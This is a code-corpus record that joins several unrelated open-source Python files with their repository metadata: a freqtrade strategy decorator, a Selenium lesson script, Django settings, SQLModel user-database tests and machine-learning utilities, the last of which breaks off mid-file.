[ "MIT" ]
null
null
null
freqtrade/strategy/informative_decorator.py
Fractate/freqbot
47b35d2320dc97977411454c1466c762d339fdee
[ "MIT" ]
1
2021-09-22T23:28:21.000Z
2021-09-22T23:28:21.000Z
from typing import Any, Callable, NamedTuple, Optional, Union from pandas import DataFrame from freqtrade.exceptions import OperationalException from freqtrade.strategy.strategy_helper import merge_informative_pair PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame] class InformativeData(NamedTuple): asset: Optional[str] timeframe: str fmt: Union[str, Callable[[Any], str], None] ffill: bool def informative(timeframe: str, asset: str = '', fmt: Optional[Union[str, Callable[[Any], str]]] = None, ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]: """ A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to define informative indicators. Example usage: @informative('1h') def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame: dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14) return dataframe :param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe. :param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use current pair. :param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not specified, defaults to: * {base}_{quote}_{column}_{timeframe} if asset is specified. * {column}_{timeframe} if asset is not specified. Format string supports these format variables: * {asset} - full name of the asset, for example 'BTC/USDT'. * {base} - base currency in lower case, for example 'eth'. * {BASE} - same as {base}, except in upper case. * {quote} - quote currency in lower case, for example 'usdt'. * {QUOTE} - same as {quote}, except in upper case. * {column} - name of dataframe column. * {timeframe} - timeframe of informative dataframe. :param ffill: ffill dataframe after merging informative pair. """ _asset = asset _timeframe = timeframe _fmt = fmt _ffill = ffill def decorator(fn: PopulateIndicators): informative_pairs = getattr(fn, '_ft_informative', []) informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill)) setattr(fn, '_ft_informative', informative_pairs) return fn return decorator def _format_pair_name(config, pair: str) -> str: return pair.format(stake_currency=config['stake_currency'], stake=config['stake_currency']).upper() def _create_and_merge_informative_pair(strategy, dataframe: DataFrame, metadata: dict, inf_data: InformativeData, populate_indicators: PopulateIndicators): asset = inf_data.asset or '' timeframe = inf_data.timeframe fmt = inf_data.fmt config = strategy.config if asset: # Insert stake currency if needed. asset = _format_pair_name(config, asset) else: # Not specifying an asset will define informative dataframe for current pair. asset = metadata['pair'] if '/' in asset: base, quote = asset.split('/') else: # When futures are supported this may need reevaluation. # base, quote = asset, '' raise OperationalException('Not implemented.') # Default format. This optimizes for the common case: informative pairs using same stake # currency. When quote currency matches stake currency, column name will omit base currency. # This allows easily reconfiguring strategy to use different base currency. In a rare case # where it is desired to keep quote currency in column name at all times user should specify # fmt='{base}_{quote}_{column}_{timeframe}' format or similar. if not fmt: fmt = '{column}_{timeframe}' # Informatives of current pair if inf_data.asset: fmt = '{base}_{quote}_' + fmt # Informatives of other pairs inf_metadata = {'pair': asset, 'timeframe': timeframe} inf_dataframe = strategy.dp.get_pair_dataframe(asset, timeframe) inf_dataframe = populate_indicators(strategy, inf_dataframe, inf_metadata) formatter: Any = None if callable(fmt): formatter = fmt # A custom user-specified formatter function. else: formatter = fmt.format # A default string formatter. fmt_args = { 'BASE': base.upper(), 'QUOTE': quote.upper(), 'base': base.lower(), 'quote': quote.lower(), 'asset': asset, 'timeframe': timeframe, } inf_dataframe.rename(columns=lambda column: formatter(column=column, **fmt_args), inplace=True) date_column = formatter(column='date', **fmt_args) if date_column in dataframe.columns: raise OperationalException(f'Duplicate column name {date_column} exists in ' f'dataframe! Ensure column names are unique!') dataframe = merge_informative_pair(dataframe, inf_dataframe, strategy.timeframe, timeframe, ffill=inf_data.ffill, append_timeframe=False, date_column=date_column) return dataframe
41.100775
100
0.656733
142
0.026782
0
0
0
0
0
0
2,408
0.454168
4c60db4ddf2f272ea38921358d511b5e55303545
835
py
Python
codigo_das_aulas/aula_09/aula_09_03.py
VeirichR/curso-python-selenium
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
[ "CC0-1.0" ]
234
2020-04-03T02:59:30.000Z
2022-03-27T15:29:21.000Z
codigo_das_aulas/aula_09/aula_09_03.py
VeirichR/curso-python-selenium
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
[ "CC0-1.0" ]
8
2020-04-20T11:20:43.000Z
2021-08-18T16:41:15.000Z
codigo_das_aulas/aula_09/aula_09_03.py
VeirichR/curso-python-selenium
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
[ "CC0-1.0" ]
77
2020-04-03T13:25:19.000Z
2022-02-24T15:31:26.000Z
from functools import partial from selenium.webdriver import Firefox from selenium.webdriver.support.ui import ( WebDriverWait ) def esperar_elemento(elemento, webdriver): print(f'Tentando encontrar "{elemento}"') if webdriver.find_elements_by_css_selector(elemento): return True return False esperar_botao = partial(esperar_elemento, 'button') esperar_sucesso = partial(esperar_elemento, '#finished') url = 'https://selenium.dunossauro.live/aula_09_a.html' driver = Firefox() wdw = WebDriverWait(driver, 10) driver.get(url) wdw.until(esperar_botao, 'Deu ruim') driver.find_element_by_css_selector('button').click() wdw.until( esperar_sucesso, 'A mensagem de sucesso não apareceu' ) sucesso = driver.find_element_by_css_selector('#finished') assert sucesso.text == 'Carregamento concluído'
21.973684
58
0.762874
0
0
0
0
0
0
0
0
193
0.230585
4c6108b6c6b2c6296484cdaaf51540f0a9efca44
1,470
py
Python
prae/losses.py
irom-lab/RL_Generalization
82add6898ee2e962a3aa5efedf80821a013eae7f
[ "MIT" ]
24
2020-06-30T11:43:38.000Z
2021-11-15T22:58:47.000Z
prae/losses.py
irom-lab/RL_Generalization
82add6898ee2e962a3aa5efedf80821a013eae7f
[ "MIT" ]
null
null
null
prae/losses.py
irom-lab/RL_Generalization
82add6898ee2e962a3aa5efedf80821a013eae7f
[ "MIT" ]
4
2020-10-15T10:54:18.000Z
2021-05-25T07:38:14.000Z
import torch from torch import nn from prae.distances import square_dist, HingedSquaredEuclidean class Loss(nn.Module): """ """ def __init__(self, hinge, neg=True, rew=True): """ """ super().__init__() self.reward_loss = square_dist # If False, no negative sampling self.neg = neg # If False, no reward loss self.rew = rew self.distance = HingedSquaredEuclidean(eps=hinge) def forward(self, z_c, z_l, z_n, z_f, r, r_e): """ """ # Transition loss transition_loss = self.distance.distance(z_n, z_l).mean() # Reward loss if self.rew: reward_loss = 0.5 * self.reward_loss(r, r_e).mean() else: reward_loss = torch.zeros_like(transition_loss) # Negative los if self.neg: z_n = tile(z_n, z_f) batch_size = z_c.shape[0] negative_loss = self.distance.negative_distance(z_n, z_f).sum()/batch_size else: negative_loss = torch.zeros_like(transition_loss) return transition_loss, reward_loss, negative_loss def tile(embedding, example): """ """ n = example.shape[0]//embedding.shape[0] embedding = embedding.unsqueeze(1).repeat(1, n, 1) embedding = squeeze_embedding(embedding) return embedding def squeeze_embedding(x): """ """ b, n, d = x.shape x = x.reshape(b*n, d) return x
24.098361
86
0.586395
1,050
0.714286
0
0
0
0
0
0
165
0.112245
4c61ecd42ed59f6a2c7fd49a38719e52edaf2a1f
845
py
Python
orion/modules/active/wolfram.py
isathish/ai_opesource
cdccd882306c45712fcdd40e15937b5a9571028a
[ "MIT" ]
null
null
null
orion/modules/active/wolfram.py
isathish/ai_opesource
cdccd882306c45712fcdd40e15937b5a9571028a
[ "MIT" ]
null
null
null
orion/modules/active/wolfram.py
isathish/ai_opesource
cdccd882306c45712fcdd40e15937b5a9571028a
[ "MIT" ]
null
null
null
""" Handles most general questions (including math!) Requires: - WolframAlpha API key Usage Examples: - "How tall is Mount Everest?" - "What is the derivative of y = 2x?" """ import wolframalpha from orion.classes.module import Module from orion.classes.task import ActiveTask from orion import settings wolfram_client = wolframalpha.Client(settings.WOLFRAM_KEY) class AnswerTask(ActiveTask): def match(self, text): return True def action(self, text): try: query = wolfram_client.query(text) self.speak(next(query.results).text) except: self.speak(settings.NO_MODULES) class Wolfram(Module): def __init__(self): tasks = [AnswerTask()] super(Wolfram, self).__init__('wolfram', tasks, priority=0)
21.666667
68
0.639053
435
0.514793
0
0
0
0
0
0
206
0.243787
4c624ee7a6d344a15a579b043c3cb6fef1c9aa3b
1,035
py
Python
polymatch/matchers/standard.py
linuxdaemon/poly-match
66d967999de982d5ee9463c46b0ff8040d91dc67
[ "MIT" ]
null
null
null
polymatch/matchers/standard.py
linuxdaemon/poly-match
66d967999de982d5ee9463c46b0ff8040d91dc67
[ "MIT" ]
26
2020-05-13T17:46:45.000Z
2022-03-18T16:07:14.000Z
polymatch/matchers/standard.py
TotallyNotRobots/poly-match
66d967999de982d5ee9463c46b0ff8040d91dc67
[ "MIT" ]
null
null
null
from polymatch import PolymorphicMatcher class ExactMatcher(PolymorphicMatcher): def compile_pattern(self, raw_pattern): return raw_pattern def compile_pattern_cs(self, raw_pattern): return raw_pattern def compile_pattern_ci(self, raw_pattern): return raw_pattern.lower() def compile_pattern_cf(self, raw_pattern): return raw_pattern.casefold() def match_text(self, pattern, text): return text == pattern @classmethod def get_type(cls): return "exact" class ContainsMatcher(PolymorphicMatcher): def compile_pattern(self, raw_pattern): return raw_pattern def compile_pattern_cs(self, raw_pattern): return raw_pattern def compile_pattern_ci(self, raw_pattern): return raw_pattern.lower() def compile_pattern_cf(self, raw_pattern): return raw_pattern.casefold() def match_text(self, pattern, text): return pattern in text @classmethod def get_type(cls): return "contains"
23.522727
46
0.696618
988
0.954589
0
0
119
0.114976
0
0
17
0.016425
4c6289a028d756ccd03ac220d11a9d33117ee573
6,530
py
Python
djcorsche/settings_default.py
carthage-college/django-djcorsche
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
[ "BSD-3-Clause" ]
null
null
null
djcorsche/settings_default.py
carthage-college/django-djcorsche
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
[ "BSD-3-Clause" ]
null
null
null
djcorsche/settings_default.py
carthage-college/django-djcorsche
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
[ "BSD-3-Clause" ]
null
null
null
""" Django settings for project. """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os # Debug #DEBUG = False DEBUG = True TEMPLATE_DEBUG = DEBUG INFORMIX_DEBUG = "debug" ADMINS = ( ('', ''), ) MANAGERS = ADMINS SECRET_KEY = '' ALLOWED_HOSTS = [] LANGUAGE_CODE = 'en-us' TIME_ZONE = 'America/Chicago' SITE_ID = 1 USE_I18N = False USE_L10N = False USE_TZ = False DEFAULT_CHARSET = 'utf-8' FILE_CHARSET = 'utf-8' SERVER_URL = "" API_URL = "%s/%s" % (SERVER_URL, "api") LIVEWHALE_API_URL = "https://%s" % (SERVER_URL) BASE_DIR = os.path.dirname(os.path.dirname(__file__)) ROOT_DIR = os.path.dirname(__file__) ROOT_URL = "/djskeletor/" ROOT_URLCONF = 'djskeletor.core.urls' WSGI_APPLICATION = 'djskeletor.wsgi.application' MEDIA_ROOT = '' ADMIN_MEDIA_PREFIX = '/static/admin/' STATIC_ROOT = '' STATIC_URL = "/static/" STATICFILES_DIRS = () STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', # 'django.contrib.staticfiles.finders.DefaultStorageFinder', ) DATABASES = { 'default': { 'HOST': '127.0.0.1', 'PORT': '3306', 'NAME': 'django_djskeletor', 'ENGINE': 'django.db.backends.mysql', #'ENGINE': 'django.db.backends.dummy', 'USER': '', 'PASSWORD': '' }, } INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.formtools', 'django.contrib.humanize', 'django.contrib.messages', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.staticfiles', 'djskeletor', 'djskeletor.core', 'djskeletor.myapp', 'djtools', ) MIDDLEWARE_CLASSES = ( 'django.middleware.cache.UpdateCacheMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.cache.FetchFromCacheMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', # the following should be uncommented unless you are # embedding your apps in iframes #'django.middleware.clickjacking.XFrameOptionsMiddleware', ) # template stuff TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ) TEMPLATE_DIRS = ( "/data2/django_projects/djskeletor/templates/", "/data2/django_templates/djkorra/", "/data2/django_templates/djcher/", "/data2/django_templates/", ) TEMPLATE_CONTEXT_PROCESSORS = ( "djtools.context_processors.sitevars", "django.contrib.auth.context_processors.auth", "django.core.context_processors.request", "django.core.context_processors.debug", "django.core.context_processors.media", ) # caching CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.dummy.DummyCache', #'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache', #'LOCATION': '127.0.0.1:11211', #'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache', #'LOCATION': '/var/tmp/django_djskeletor_cache', #'TIMEOUT': 60*20, #'KEY_PREFIX': "DJSKELETOR_", #'OPTIONS': { # 'MAX_ENTRIES': 80000, #} } } CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True # LDAP Constants LDAP_SERVER = '' LDAP_SERVER_PWM = '' LDAP_PORT = '' LDAP_PORT_PWM = '' LDAP_PROTOCOL = "" LDAP_PROTOCOL_PWM = "" LDAP_BASE = "" LDAP_USER = "" LDAP_PASS = "" LDAP_EMAIL_DOMAIN = "" LDAP_OBJECT_CLASS = "" LDAP_OBJECT_CLASS_LIST = [] LDAP_GROUPS = {} LDAP_RETURN = [] LDAP_RETURN_PWM = [] LDAP_ID_ATTR = "" LDAP_CHALLENGE_ATTR = "" # auth backends AUTHENTICATION_BACKENDS = ( 'djauth.ldapBackend.LDAPBackend', 'django.contrib.auth.backends.ModelBackend', ) LOGIN_URL = '/djskeletor/accounts/login/' LOGIN_REDIRECT_URL = '/djskeletor/' USE_X_FORWARDED_HOST = True #SESSION_ENGINE = "django.contrib.sessions.backends.cache" SESSION_EXPIRE_AT_BROWSER_CLOSE = False SESSION_COOKIE_DOMAIN=".carthage.edu" SESSION_COOKIE_NAME ='django_djskeletor_cookie' SESSION_COOKIE_AGE = 86400 # SMTP settings EMAIL_HOST = '' EMAIL_HOST_USER = '' EMAIL_HOST_PASSWORD = '' EMAIL_USE_TLS = True EMAIL_PORT = 587 EMAIL_FAIL_SILENTLY = False DEFAULT_FROM_EMAIL = '' SERVER_EMAIL = '' SERVER_MAIL='' # logging LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/") LOG_FILENAME = LOG_FILEPATH + "debug.log" LOGGING = { 'version': 1, 'disable_existing_loggers': True, 'formatters': { 'standard': { 'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s", 'datefmt' : "%Y/%b/%d %H:%M:%S" }, 'verbose': { 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s', 'datefmt' : "%Y/%b/%d %H:%M:%S" }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'null': { 'level':'DEBUG', 'class':'django.utils.log.NullHandler', }, 'logfile': { 'level':'DEBUG', 'class':'logging.handlers.RotatingFileHandler', 'filename': LOG_FILENAME, 'maxBytes': 50000, 'backupCount': 2, 'formatter': 'standard', }, 'console':{ 'level':'INFO', 'class':'logging.StreamHandler', 'formatter': 'standard' }, 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'include_html': True, 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'djskeletor': { 'handlers':['logfile'], 'propagate': True, 'level':'DEBUG', }, 'django': { 'handlers':['console'], 'propagate': True, 'level':'WARN', }, 'django.db.backends': { 'handlers': ['console'], 'level': 'DEBUG', 'propagate': False, }, 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } }
27.552743
96
0.620214
0
0
0
0
0
0
0
0
3,590
0.54977
4c6339b396838bba425536d8c48a53a76850151f
956
py
Python
records/12-09/ffff.py
AaronYang2333/CSCI_570
03e34ce5ff192fc94612bc3afb51dcab3e854462
[ "Apache-2.0" ]
36
2020-07-25T00:13:25.000Z
2022-02-28T17:48:15.000Z
records/12-09/ffff.py
AaronYang2333/LeetCode
03e34ce5ff192fc94612bc3afb51dcab3e854462
[ "Apache-2.0" ]
6
2020-06-06T04:39:37.000Z
2021-04-03T01:45:39.000Z
records/12-09/ffff.py
AaronYang2333/LeetCode
03e34ce5ff192fc94612bc3afb51dcab3e854462
[ "Apache-2.0" ]
16
2020-12-16T02:38:16.000Z
2022-02-28T17:48:16.000Z
__author__ = 'Aaron Yang' __email__ = '[email protected]' __date__ = '12/9/2020 4:18 PM' from abc import abstractmethod class Product(object): @abstractmethod def setMsg(self, msg="default info"): self.msg = msg @abstractmethod def info(self): print(self.msg) class DefaultObj(Product): def __init__(self): super().setMsg() class Factory(object): @abstractmethod def produce(self): return DefaultObj() class PC(Product): def __init__(self): self.setMsg('pc info') class LAPTOP(Product): def __init__(self): self.setMsg('laptop info') class PCFactory(Factory): def produce(self): return PC() class LAPTOPFactory(Factory): def produce(self): return LAPTOP() if __name__ == '__main__': ss = Factory().produce() pc = PCFactory().produce() laptop = LAPTOPFactory().produce() pc.info() laptop.info() ss.info()
16.20339
41
0.624477
640
0.669456
0
0
205
0.214435
0
0
95
0.099372
4c63d036bfd0e51ade860a3521aecee117e88f7d
7,064
py
Python
tests/test_users.py
fastapi-users/fastapi-users-db-sqlmodel
3a46b80399f129aa07a834a1b40bf49d08c37be1
[ "MIT" ]
18
2021-09-09T09:35:30.000Z
2022-03-19T04:58:17.000Z
tests/test_users.py
fastapi-users/fastapi-users-db-sqlmodel
3a46b80399f129aa07a834a1b40bf49d08c37be1
[ "MIT" ]
null
null
null
tests/test_users.py
fastapi-users/fastapi-users-db-sqlmodel
3a46b80399f129aa07a834a1b40bf49d08c37be1
[ "MIT" ]
3
2021-11-01T16:58:54.000Z
2022-02-15T16:17:11.000Z
import uuid from typing import AsyncGenerator import pytest from sqlalchemy import exc from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine from sqlalchemy.orm import sessionmaker from sqlmodel import Session, SQLModel, create_engine from fastapi_users_db_sqlmodel import ( NotSetOAuthAccountTableError, SQLModelUserDatabase, SQLModelUserDatabaseAsync, ) from tests.conftest import OAuthAccount, UserDB, UserDBOAuth safe_uuid = uuid.UUID("a9089e5d-2642-406d-a7c0-cbc641aca0ec") async def init_sync_session(url: str) -> AsyncGenerator[Session, None]: engine = create_engine(url, connect_args={"check_same_thread": False}) SQLModel.metadata.create_all(engine) with Session(engine) as session: yield session SQLModel.metadata.drop_all(engine) async def init_async_session(url: str) -> AsyncGenerator[AsyncSession, None]: engine = create_async_engine(url, connect_args={"check_same_thread": False}) make_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False) async with engine.begin() as conn: await conn.run_sync(SQLModel.metadata.create_all) async with make_session() as session: yield session await conn.run_sync(SQLModel.metadata.drop_all) @pytest.fixture( params=[ (init_sync_session, "sqlite:///./test-sqlmodel-user.db", SQLModelUserDatabase), ( init_async_session, "sqlite+aiosqlite:///./test-sqlmodel-user.db", SQLModelUserDatabaseAsync, ), ], ids=["sync", "async"], ) async def sqlmodel_user_db(request) -> AsyncGenerator[SQLModelUserDatabase, None]: create_session = request.param[0] database_url = request.param[1] database_class = request.param[2] async for session in create_session(database_url): yield database_class(UserDB, session) @pytest.fixture( params=[ ( init_sync_session, "sqlite:///./test-sqlmodel-user-oauth.db", SQLModelUserDatabase, ), ( init_async_session, "sqlite+aiosqlite:///./test-sqlmodel-user-oauth.db", SQLModelUserDatabaseAsync, ), ], ids=["sync", "async"], ) async def sqlmodel_user_db_oauth(request) -> AsyncGenerator[SQLModelUserDatabase, None]: create_session = request.param[0] database_url = request.param[1] database_class = request.param[2] async for session in create_session(database_url): yield database_class(UserDBOAuth, session, OAuthAccount) @pytest.mark.asyncio @pytest.mark.db async def test_queries(sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]): user = UserDB( id=safe_uuid, email="[email protected]", hashed_password="guinevere", ) # Create user_db = await sqlmodel_user_db.create(user) assert user_db.id is not None assert user_db.is_active is True assert user_db.is_superuser is False assert user_db.email == user.email # Update user_db.is_superuser = True await sqlmodel_user_db.update(user_db) # Get by id id_user = await sqlmodel_user_db.get(user.id) assert id_user is not None assert id_user.id == user_db.id assert id_user.is_superuser is True # Get by email email_user = await sqlmodel_user_db.get_by_email(str(user.email)) assert email_user is not None assert email_user.id == user_db.id # Get by uppercased email email_user = await sqlmodel_user_db.get_by_email("[email protected]") assert email_user is not None assert email_user.id == user_db.id # Unknown user unknown_user = await sqlmodel_user_db.get_by_email("[email protected]") assert unknown_user is None # Delete user await sqlmodel_user_db.delete(user) deleted_user = await sqlmodel_user_db.get(user.id) assert deleted_user is None # Exception when trying to get by OAuth account with pytest.raises(NotSetOAuthAccountTableError): await sqlmodel_user_db.get_by_oauth_account("foo", "bar") @pytest.mark.asyncio @pytest.mark.db async def test_insert_existing_email( sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount] ): user = UserDB( id=safe_uuid, email="[email protected]", hashed_password="guinevere", ) await sqlmodel_user_db.create(user) with pytest.raises(exc.IntegrityError): await sqlmodel_user_db.create( UserDB(id=safe_uuid, email=user.email, hashed_password="guinevere") ) @pytest.mark.asyncio @pytest.mark.db async def test_insert_non_nullable_fields( sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount] ): with pytest.raises(exc.IntegrityError): wrong_user = UserDB( id=safe_uuid, email="[email protected]", hashed_password="aaa" ) wrong_user.email = None # type: ignore await sqlmodel_user_db.create(wrong_user) @pytest.mark.asyncio @pytest.mark.db async def test_queries_custom_fields( sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount], ): """It should output custom fields in query result.""" user = UserDB( id=safe_uuid, email="[email protected]", hashed_password="guinevere", first_name="Lancelot", ) await sqlmodel_user_db.create(user) id_user = await sqlmodel_user_db.get(user.id) assert id_user is not None assert id_user.id == user.id assert id_user.first_name == user.first_name @pytest.mark.asyncio @pytest.mark.db async def test_queries_oauth( sqlmodel_user_db_oauth: SQLModelUserDatabase[UserDBOAuth, OAuthAccount], oauth_account1, oauth_account2, ): user = UserDBOAuth( id=safe_uuid, email="[email protected]", hashed_password="guinevere", oauth_accounts=[oauth_account1, oauth_account2], ) # Create user_db = await sqlmodel_user_db_oauth.create(user) assert user_db.id is not None assert hasattr(user_db, "oauth_accounts") assert len(user_db.oauth_accounts) == 2 # Update user_db.oauth_accounts[0].access_token = "NEW_TOKEN" await sqlmodel_user_db_oauth.update(user_db) # Get by id id_user = await sqlmodel_user_db_oauth.get(user.id) assert id_user is not None assert id_user.id == user_db.id assert id_user.oauth_accounts[0].access_token == "NEW_TOKEN" # Get by email email_user = await sqlmodel_user_db_oauth.get_by_email(str(user.email)) assert email_user is not None assert email_user.id == user_db.id assert len(email_user.oauth_accounts) == 2 # Get by OAuth account oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account( oauth_account1.oauth_name, oauth_account1.account_id ) assert oauth_user is not None assert oauth_user.id == user.id assert len(oauth_user.oauth_accounts) == 2 # Unknown OAuth account unknown_oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account("foo", "bar") assert unknown_oauth_user is None
30.982456
88
0.709513
0
0
1,368
0.193658
5,775
0.817525
5,674
0.803228
841
0.119054
4c64a40785307d838c76dd7877d9296fa9590e81
623
py
Python
copy_reg.py
rtbo/vkdgen
04a228961bb091b59dc6f741eee703cd81724ca3
[ "MIT" ]
2
2021-01-08T15:05:27.000Z
2021-10-12T08:44:01.000Z
copy_reg.py
rtbo/vkdgen
04a228961bb091b59dc6f741eee703cd81724ca3
[ "MIT" ]
null
null
null
copy_reg.py
rtbo/vkdgen
04a228961bb091b59dc6f741eee703cd81724ca3
[ "MIT" ]
null
null
null
#! /usr/bin/env python3 import os from os import path root_dir = path.dirname(path.realpath(__file__)) local_reg_dir = path.join(root_dir, 'registry') os.makedirs(local_reg_dir, exist_ok=True) def copy_reg(reg_dir, files): import shutil for f in files: file_path = path.join(reg_dir, f) if not path.isfile(file_path): raise RuntimeError(file_path + ' could not be found') shutil.copy2(file_path, path.join(local_reg_dir, path.basename(f))) vk_files = [ 'registry/vk.xml', 'registry/reg.py', 'registry/generator.py' ] copy_reg(path.join(root_dir, 'Vulkan-Headers'), vk_files)
31.15
76
0.704655
0
0
0
0
0
0
0
0
127
0.203852
4c64de6df990440fb9bf292eb702bdb614dfcfae
22,653
py
Python
utils.py
atward424/ASCVD_ML
39404dd5f50a527576b91e8f53f5157f76382712
[ "Apache-2.0" ]
1
2021-04-08T07:05:18.000Z
2021-04-08T07:05:18.000Z
utils.py
atward424/ASCVD_ML
39404dd5f50a527576b91e8f53f5157f76382712
[ "Apache-2.0" ]
null
null
null
utils.py
atward424/ASCVD_ML
39404dd5f50a527576b91e8f53f5157f76382712
[ "Apache-2.0" ]
1
2021-04-08T07:07:53.000Z
2021-04-08T07:07:53.000Z
import numpy as np import pandas as pd import scipy.stats as st #from medical_ML import Experiment import matplotlib.pyplot as plt import xgboost as xgb from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier from sklearn.dummy import DummyClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.linear_model import LogisticRegression, Lasso from sklearn.neighbors import KNeighborsClassifier from sklearn.svm import SVC from sklearn import linear_model from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor from sklearn.dummy import DummyRegressor def split_cohort(datafile, to_exclude = None, test_ind_col = None, drop = 'some'): """ Load and clean the dataset """ if isinstance(datafile, str): data = pd.read_csv(datafile) else: data = datafile test_data = None if to_exclude is not None: for k in to_exclude.keys(): if k == 'race': data = data[data[k].isin(to_exclude[k])] elif k == 'agebl': data = data[data[k] >= to_exclude[k]] elif to_exclude[k]: data = data[data[k] == 0] if drop == 'some': data = data.drop(k, axis = 1) if drop == 'all': if (k != 'race') & (k != 'agebl'): data = data.drop(k, axis = 1) # self.data = self.data[self.data['year'] <= 2010] # self.data = self.data.drop(['year'], axis = 1) if test_ind_col is not None: test_data = data[data[test_ind_col] == 1] test_data = test_data.drop(test_ind_col, axis = 1) data = data[data[test_ind_col] == 0] data = data.drop(test_ind_col, axis = 1) return(data, test_data) def calc_auc_conf_interval(AUC, N1, N2, ci = 0.95): # from https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/PASS/Confidence_Intervals_for_the_Area_Under_an_ROC_Curve.pdf zsc = st.norm.ppf(1 - (1-ci)/2.) q1 = AUC / (2 - AUC) q2 = (2 * AUC * AUC) / (1 + AUC) numerator = AUC * (1 - AUC) + (N1 - 1) * (q1 - AUC * AUC) + (N2 - 1) * (q2 - AUC * AUC) denom = N1 * N2 se_AUC = np.sqrt(numerator / denom) return (se_AUC, AUC - zsc * se_AUC, AUC, AUC + zsc * se_AUC) def load_models_and_parameters_default(): models_and_parameters = { 'dummy_reg': (DummyRegressor(), {"strategy": ["mean"]}), 'lasso_reg': (linear_model.Lasso(), {'alpha': np.arange(0.1, 1.0, 0.01), 'max_iter': [10000]}), 'rf_reg': (RandomForestRegressor(), {'n_estimators': [501], 'criterion': ['mae'], 'max_depth': [3, 5, 10], 'max_features': ['auto', 'sqrt', 'log2']}), 'gbm_reg': (GradientBoostingRegressor(), {'n_estimators': [501], 'criterion': ['mae'], # 'loss': ['ls', 'lad'], 'max_depth': [3, 5, 10], 'max_features': ['auto', 'sqrt', 'log2']}), 'dummy': (DummyClassifier(), {"strategy": ["most_frequent"]}), # 'logreg': (LogisticRegression(), # {"class_weight": [None], # "C":[0.1, 0.3, 1,5, 10]}), #, "balanced" # 'logreg': (LogisticRegression(), # {"class_weight": [None], # "C":[0.01,0.1, 1]}), #, "balanced" # "C":[0.1]}), #, "balanced" 'logreg': (LogisticRegression(), {}), #, "balanced" # "C":[0.1]}), #, "balanced" 'lasso': (Lasso(), {"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05), 'max_iter': [10000]}), # 'lasso2': (LogisticRegression(penalty = 'l1'), # {"C":[0.001, 0.01,0.1, 1]}), 'lasso2': (LogisticRegression(penalty = 'l1',solver ='saga'), {}), 'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'), {"C":[0.001, 0.01,0.1, 1], "l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}), 'dt': (DecisionTreeClassifier(), {"criterion": ["entropy"], # "max_depth": [2, 3, 4, 5, 10, 20], # None "max_depth": [1, 2, 3, 4], # None "splitter": ["best", "random"], "min_samples_split": [2, 5, 10], "min_samples_leaf": [3, 5, 10, 15, 20], "random_state": [817263]}), 'svm': (SVC(), {'C': [ 1], 'kernel': ['linear']}), #'poly', 'rbf' 'knn': (KNeighborsClassifier(), {'n_neighbors': [2, 3, 5, 10, 20, 50], 'weights': ['uniform', 'distance']}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [501], # 'max_depth': [3, 5, 10], # 'max_features': ['auto', 'sqrt', 'log2']}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [50, 100, 501, 1000], # 'max_depth': [3,5,7], # "min_samples_split": [2, 5], # 'max_features': ['auto', 0.5], # "class_weight": [None, "balanced"]}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [501], # 'max_depth': [5], # "min_samples_split": [5], # 'max_features': ['auto'], # "class_weight": [None]}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [ 501, 1000, 2000, 4000], # 'max_depth': 